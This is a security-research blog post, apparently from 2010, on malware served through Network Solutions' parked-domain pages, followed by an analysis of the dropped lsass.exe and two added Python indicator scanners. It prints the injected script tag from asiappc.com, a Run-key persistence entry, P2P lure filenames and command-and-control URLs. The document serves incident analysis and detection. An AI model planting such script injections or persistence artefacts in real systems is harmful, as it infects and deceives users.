More than 500,000 (or 5,000,000 according to Yahoo) Network Solutions parked domains actively serving malware

(by Wayne Huang, Chris Hsiao, NightCola, and other Armorize colleagues)
(see Part 1 here)
(please see our follow-up post if you have time)

A few days ago, in response to questions from one of our largest customers, we analyzed a widget by Network Solutions, confirmed that it was infected, and published our previous blog post, "SMCI widget and growsmartbusiness.com by Network Solutions still serving malware."

That post was actually a report we wrote for this customer, to assure them that although other detection mechanisms weren't flagging these pages, we were right to flag them as malicious.

Soon after publishing the post, we realized that it was the same widget that had infected the boingboing.com parked domain, which we blogged about back in May.

Yesterday I had some time to sit down and study this widget further, and discovered something critical--it's part of the standard domain parking page of Network Solutions.

And so, just how many domains (not pages) are currently affected and serving malware?

More than 500,000 domains, according to Google:

According to Yahoo, add a zero to that, at least 5,000,000 domains:

I didn't have time to click on every single one of them, but I clicked on enough to conclude that all of them are indeed infected, via the same widget we blogged about a few days ago. Also, neither Google nor Yahoo actually shows all results: Google shows only the first 45 pages, and Yahoo only the first 100. So we couldn't really go through all the domains one by one...and 5 million is too large a number for manual verification anyway.

Deciding to look a bit deeper to see if there are other infections, I realized that there are. The behavior is very much the same as in our boingboing.com alert back in May.

One infection, in addition to the widget, is this:
<script src=" http://www.asiappc.com/sp/newskbanner/728x90.js" language="JavaScript" charset="gb2312"></script>


Analyzing this and comparing it with the traffic logs from the boingboing.com post back in May, we concluded that the attacker uses the following free traffic analysis services, which are the two most popular choices among attackers in greater China--cnzz and 51.la. Specifically, the following accounts are used:

1. 51.la ID 3542139
2. cnzz.com ID 1803216
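As an added example (not code from the original post or from Armorize), here is a small Python scanner that applies the two kinds of indicator above to a page's HTML: it lists every third-party <script> src, flags the www.asiappc.com host, and extracts the account ID from any 51.la or cnzz.com counter script so it can be compared against the two "skbanner" IDs. The sample page is constructed; the counter URL forms it uses (js.users.51.la/<id>.js and cnzz.com/stat.php?id=<id>) are an assumption about those services' script formats, and the parked page's host name is made up.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the post: the injected script host and the two
# counter accounts registered under the "skbanner" handle.
KNOWN_BAD_HOSTS = {"www.asiappc.com"}
KNOWN_COUNTER_IDS = {"51.la": "3542139", "cnzz.com": "1803216"}


class ScriptCollector(HTMLParser):
    """Collects the src and charset of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        # The injected tag in the post carries a leading space inside src;
        # strip it so the URL still parses.
        src = (a.get("src") or "").strip()
        if src:
            self.scripts.append({"src": src, "charset": a.get("charset")})


def counter_id(host, src):
    """Return (service, account id) for a 51.la or cnzz.com counter URL.
    The URL shapes matched here are an assumption about those services."""
    if host.endswith("51.la"):
        m = re.search(r"/(\d+)\.js$", src)
        return ("51.la", m.group(1)) if m else None
    if host.endswith("cnzz.com"):
        m = re.search(r"[?&]id=(\d+)", src)
        return ("cnzz.com", m.group(1)) if m else None
    return None


def scan_page(html, page_host):
    """Return a list of (finding, detail, src) for third-party scripts that
    match the post's indicators. page_host is the page's own host name so
    same-origin scripts are ignored."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for s in p.scripts:
        host = urlparse(s["src"]).netloc.lower()
        if not host or host == page_host.lower():
            continue  # inline or same-origin script
        if host in KNOWN_BAD_HOSTS:
            findings.append(("known_bad_host", host, s["src"]))
        cid = counter_id(host, s["src"])
        if cid and KNOWN_COUNTER_IDS.get(cid[0]) == cid[1]:
            findings.append(("attacker_counter", f"{cid[0]} ID {cid[1]}", s["src"]))
    return findings


# Constructed sample of a parked page carrying the injected script and both
# counters (hypothetical page host; counter URL forms are assumed).
SAMPLE_PAGE = """<html><head><title>parked</title>
<script src="/js/park.js"></script>
<script src=" http://www.asiappc.com/sp/newskbanner/728x90.js" language="JavaScript" charset="gb2312"></script>
<script src="http://js.users.51.la/3542139.js"></script>
<script src="http://s4.cnzz.com/stat.php?id=1803216&amp;web_id=1803216"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, "parked-example.com"):
        print(finding)
```

Run against the sample it reports the asiappc.com script once and each counter once; a page with only same-origin scripts yields nothing. Matching on the counter account ID rather than the counter host is the point: the services themselves are legitimate, only these two accounts tie a page to this campaign.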

Since both accounts were registered under the handle "skbanner," we assume it's not multiple infections by different attackers but the same attacker using two counters. The 51.la account can be accessed:

First, the account was registered on Feb 5th. A day later, on Feb 6th, Tata Consulting Services, which uses Network Solutions as its domain registrar, had its DNS records manipulated, according to TechCrunch and other media. This all happened shortly after Jan 19th, when Network Solutions publicly acknowledged that some of their sites had been hacked and that they were addressing the problem.

The 51.la "skbanner" counter recorded 2,683,120 cumulative page views--that's a lot of victims out there.

The highest page view count was seen on April 3rd, 2010. This time frame is close to the largest incident in this series: on April 7th, WordPress admins started posting on the WordPress Forum, complaining that their WordPress installations hosted on Network Solutions had been compromised and were serving malware. That thread had 151 posts in total.

Network Solutions acknowledged the problem on April 9th with a blog post, "Alert: WordPress Blog & Network Solutions." If these events are associated, then sometime in early April the attacker group must have decided to leverage the control they had over Network Solutions and massively inject malicious content, not into the default parked domain page, but into the hosted WordPress blogs and/or websites.

It's concerning that this series of compromises started in January of this year, and today we are still seeing more than 500,000 Network Solutions domains actively serving malware as we write.

We also just registered a domain, armorizetest.com, with Network Solutions, and verified that it indeed actively serves malware the moment that it's up. Here's what we did:

First we paid for our domain:



Then we set it to park using the "standard construction page":

It's done. We connect to our newly purchased and parked domain, and as you can see, the fake (and malicious) QQ message box pops up, and the compromised (and malicious) Network Solutions SMCI widget is there too. From the traffic, yes, it's serving malicious content, the same as described in our last blog post.

One of the dropped malware executables is: C:\Documents and Settings\Administrator\Application Data\SystemProc\lsass.exe
The hidden directory SystemProc is created by a JavaScript exploit.

VirusTotal says that the detection rate by antivirus companies for this lsass.exe file is exactly 50%--21 out of 42 antivirus solutions detect this file.

We have prepared a demo video here:


Follow-up:
We managed to get in touch with Network Solutions, and within less than three hours they acted and took down the widget. Actually, they commented the code out, so you can still see it if you "view source."

At the same time, while trying to figure out the exact number of affected domains, we realized that Yahoo is probably more correct on this--it was more than five million domains! Here's a video:


Finally, as to the dropped malware lsass.exe itself, here's what it does (credits to Chris Hsiao):
When run, it creates the following components:
========================================================
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\install.rdf
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome.manifest
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome\content\timer.xul
%USERPROFILE%\Application Data\SystemProc\lsass.exe

The following registry value is added under the Run key so that it auto-starts after reboot:
=========================================================
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDBPL" = "%appdata%\SystemProc\lsass.exe"

It monitors the following Web browsers:
=========================================================
Explorer
Opera
Chrome
Firefox

User searches on the following search engines are redirected to another Web site:
===========================================================
Google
Ask
Yahoo!
AOL
Bing

It monitors for the following search terms and pops up advertisements accordingly:
============================================================
cialis
pharma
casino
finance
mortgage
insurance
gambling
health
hotel
travel
antivirus
antivir
pocker
poker
video
baby
bany
porn
golf
diet
vocations
design
graphic
football
footbal
estate
baseball
shop
books
gifts
money
spyware
credit
loans
loan
dating
ebay
myspace
virus
film
ipod
verizon
amazon
iphone
software
movie
mobile
bank
music
cars
craigslist
game
sport
medical
school
wallpaper
military
weather
twitter
fashion
spybot
trading
tramadol
yobt
flower
cigarettes
doctor
flights
airlines
comcast

It searches for the following directories:
======================================================
C:\program files\winmx\shared\
C:\program files\tesla\files\
C:\program files\limewire\shared\
C:\program files\morpheus\my shared folder\
C:\program files\emule\incoming\
C:\program files\edonkey2000\incoming\
C:\program files\bearshare\shared\
C:\program files\grokster\my grokster\
C:\program files\icq\shared folder\
C:\program files\kazaa lite k++\my shared folder\
C:\program files\kazaa lite\my shared folder\
C:\program files\kazaa\my shared folder\

If any of the above directories are found, it copies itself (lsass.exe) into them, renamed to the following names:
===========================================================
YouTubeGet 5.6.exe
Youtube Music Downloader 1.3.exe
WinRAR v3.x keygen [by HiXem].exe
Windows2008 keygen and activator.exe
[+ MrKey +] Windows XP PRO Corp SP3 valid-key generator.exe
Windows Password Cracker + Elar3 key.exe
[Eni0j0 team] Windows 7 Ultimate keygen.exe
Windows 2008 Enterprise Server VMWare Virtual Machine.exe
Winamp.Pro.v7.xx.PowerPack.Portable+installer.exe
Website Hacker.exe
[Eni0j0 team] Vmvare keygen.exe
VmWare 7.x keygen.exe
UT 2003 KeyGen.exe
Twitter FriendAdder 2.3.9.exe
Tuneup Ultilities 2010.exe
[antihack tool] Trojan Killer v2.9.4173.exe
Total Commander7 license+keygen.exe
Super Utilities Pro 2009 11.0.exe
Sub7 2.5.1 Private.exe
Sophos antivirus updater bypass.exe
sdbot with NetBIOS Spread.exe
[fixed]RapidShare Killer AIO 2010.exe
Rapidshare Auto Downloader 3.8.6.exe
Power ISO v4.4 + keygen milon.exe
[patched, serial not needed] PDF Unlocker v2.0.5.exe
PDF-XChange Pro.exe
[patched, serial not needed] PDF to Word Converter 3.4.exe
PDF password remover (works with all acrobat reader).exe
Password Cracker.exe
Norton Internet Security 2010 crack.exe
Norton Anti-Virus 2010 Enterprise Crack.exe
Norton Anti-Virus 2005 Enterprise Crack.exe
NetBIOS Hacker.exe
NetBIOS Cracker.exe
[patched, serial not need] Nero 9.x keygen.exe
Myspace theme collection.exe
MSN Password Cracker.exe
Mp3 Splitter and Joiner Pro v3.48.exe
Motorola, nokia, ericsson mobil phone tools.exe
Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe
Microsoft Visual Studio KeyGen.exe
Microsoft Visual C++ KeyGen.exe
Microsoft Visual Basic KeyGen.exe
McAfee Total Protection 2010 [serial patch by AnalGin].exe
Magic Video Converter 8.exe
LimeWire Pro v4.18.3 [Cracked by AnalGin].exe
L0pht 4.0 Windows Password Cracker.exe
K-Lite Mega Codec v5.2 Portable.exe
K-Lite Mega Codec v5.2.exe
Keylogger unique builder.exe
Kaspersky Internet Security 2010 keygen.exe
Kaspersky AntiVirus 2010 crack.exe
IP Nuker.exe
Internet Download Manager V5.exe
Image Size Reducer Pro v1.0.1.exe
ICQ Hacker Trial version [brute].exe
Hotmail Hacker [Brute method].exe
Hotmail Cracker [Brute method].exe
Half-Life 2 Downloader.exe
Grand Theft Auto IV [Offline Activation + mouse patch].exe
Google SketchUp 7.1 Pro.exe
G-Force Platinum v3.7.6.exe
FTP Cracker.exe
DVD Tools Nero 10.x.x.x.exe
Download Boost 2.0.exe
Download Accelerator Plus v9.2.exe
Divx Pro 7.x version Keymaker.exe
DivX 5.x Pro KeyGen generator.exe
DCOM Exploit archive.exe
Daemon Tools Pro 4.8.exe
Counter-Strike Serial key generator [Miona patch].exe
CleanMyPC Registry Cleaner v6.02.exe
Brutus FTP Cracker.exe
Blaze DVD Player Pro v6.52.exe
BitDefender AntiVirus 2010 Keygen.exe
Avast 5.x Professional.exe
Avast 4.x Professional.exe
Ashampoo Snap 3.xx [Skarleot Group].exe
AOL Password Cracker.exe
AOL Instant Messenger (AIM) Hacker.exe
AnyDVD HD v.6.3.1.8 Beta incl crack.exe
Anti-Porn v13.x.x.x.exe
Alcohol 120 v1.9.x.exe
Adobe Photoshop CS4 crack by M0N5KI Hack Group.exe
Adobe Illustrator CS4 crack.exe
Adobe Acrobat Reader keygen.exe
Ad-aware 2010.exe
[patched, serial not needed] Absolute Video Converter 6.2-7.exe

It retrieves the following URLs to fetch commands and download more malware (links currently not working):
======================================================
http://updrandomhottys.com/update.php?sd=2010-03-23&aid=blackout
http://updrandomhottys.com/inst.php?aid=blackout
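The behaviour above reduces to a handful of host artefacts a responder can sweep for: the RTHDBPL Run value, the dropped files under SystemProc and the Firefox extensions folder, and renamed copies of the sample in P2P share folders. The following Python script is an added example, not the post's or Armorize's code. Its matcher functions take an inventory (Run values, file paths, share-folder listings) so they can be tested anywhere; it only collects that inventory itself when run on Windows, via winreg and os. The share folders and lure names are a trimmed subset of the lists above, the SHA-256 comparison against the dropped lsass.exe is my addition (the post gives no hash), and the sample inventory in the usage is constructed.

```python
import hashlib
import os
import sys

# Artefacts the post lists for the dropped lsass.exe. Environment variables
# stay unexpanded here and are expanded at collection time on Windows.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE = "RTHDBPL"
DROPPED_FILES = [
    r"%APPDATA%\SystemProc\lsass.exe",
    r"%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\install.rdf",
    r"%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome\content\timer.xul",
]
# Trimmed subset of the share folders and lure names from the post; a real
# sweep would carry every entry given there.
SHARE_DIRS = [
    r"C:\program files\limewire\shared",
    r"C:\program files\emule\incoming",
    r"C:\program files\kazaa\my shared folder",
]
LURE_NAMES = {
    "YouTubeGet 5.6.exe",
    "Website Hacker.exe",
    "Password Cracker.exe",
    "Norton Internet Security 2010 crack.exe",
}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def expanded_artifacts():
    """The dropped-file paths with environment variables expanded (a no-op
    for %VAR% forms on non-Windows hosts)."""
    return [os.path.expandvars(p) for p in DROPPED_FILES]


def check_run_values(run_values):
    """run_values: {value_name: command} as read from HKLM\...\Run.
    Flags the RTHDBPL value by name, and any value launching a
    SystemProc\lsass.exe whatever it is called: the genuine lsass.exe lives
    in System32 and never needs a Run entry."""
    hits = []
    for name, cmd in run_values.items():
        norm = cmd.lower().replace("/", "\\")
        if name.upper() == RUN_VALUE or "systemproc\\lsass.exe" in norm:
            hits.append((name, cmd))
    return hits


def check_dropped_files(existing_paths):
    """existing_paths: absolute paths found on the host; returns the
    (unexpanded) artefact entries that are present, compared case-insensitively."""
    present = {p.lower() for p in existing_paths}
    return [raw for raw, full in zip(DROPPED_FILES, expanded_artifacts())
            if full.lower() in present]


def find_lure_copies(listing, dropper_hash=None, hasher=None):
    """listing: {share_dir: [file names]}. A file is flagged when its name is
    a known lure name, or when its content hashes to the dropper's hash,
    which also catches copies renamed to something not on the list."""
    hits = []
    for d, names in listing.items():
        for n in names:
            path = os.path.join(d, n)
            if n in LURE_NAMES:
                hits.append(("lure_name", path))
            elif dropper_hash and hasher and hasher(path) == dropper_hash:
                hits.append(("same_hash", path))
    return hits


def collect_run_values():
    """Windows only: enumerate the values of HKLM\...\Run."""
    import winreg
    vals, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as k:
        while True:
            try:
                name, data, _ = winreg.EnumValue(k, i)
            except OSError:
                break
            vals[name] = str(data)
            i += 1
    return vals


def main():
    if sys.platform != "win32":
        print("host collection runs on Windows only; matcher functions work anywhere")
        return
    hits = check_run_values(collect_run_values())
    hits += check_dropped_files([p for p in expanded_artifacts() if os.path.exists(p)])
    dropper = expanded_artifacts()[0]
    dropper_hash = sha256_of(dropper) if os.path.isfile(dropper) else None
    listing = {d: os.listdir(d) for d in SHARE_DIRS if os.path.isdir(d)}
    hits += find_lure_copies(listing, dropper_hash, sha256_of)
    for hit in hits:
        print("SUSPECT:", hit)


if __name__ == "__main__":
    main()
```

Matching the Run value on the SystemProc\lsass.exe target as well as on the RTHDBPL name matters: the value name is cheap for a variant to change, the launch path less so. Likewise the hash comparison in the share folders catches copies the post's name list does not cover.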

